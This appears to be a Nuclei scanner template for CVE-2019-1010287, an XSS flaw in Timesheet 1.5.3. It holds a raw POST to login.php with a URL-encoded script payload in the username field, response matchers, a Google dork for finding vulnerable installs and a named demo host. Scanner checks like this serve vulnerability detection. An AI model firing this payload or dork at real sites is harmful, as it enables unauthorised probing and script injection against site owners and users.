id: CVE-2019-1010287 info: name: Timesheet 1.5.3 - Cross Site Scripting author: pikpikcu severity: high reference: https://nvd.nist.gov/vuln/detail/CVE-2019-1010287 tags: cve,cve2019,timesheet,xss # Google-Dork: inurl:"/timesheet/login.php" # Demo: http://www.mdh-tz.info/ requests: - raw: # Metod POST From login.php - | POST /timesheet/login.php HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 91 DNT: 1 Connection: keep-alive Upgrade-Insecure-Requests: 1 username=%27%22%3E%3Cscript%3Ejavascript%3Aalert%28document.domain%29%3C%2Fscript%3E&password=pd&submit=Login matchers-condition: and matchers: - type: status status: - 200 - type: word words: - '>' part: body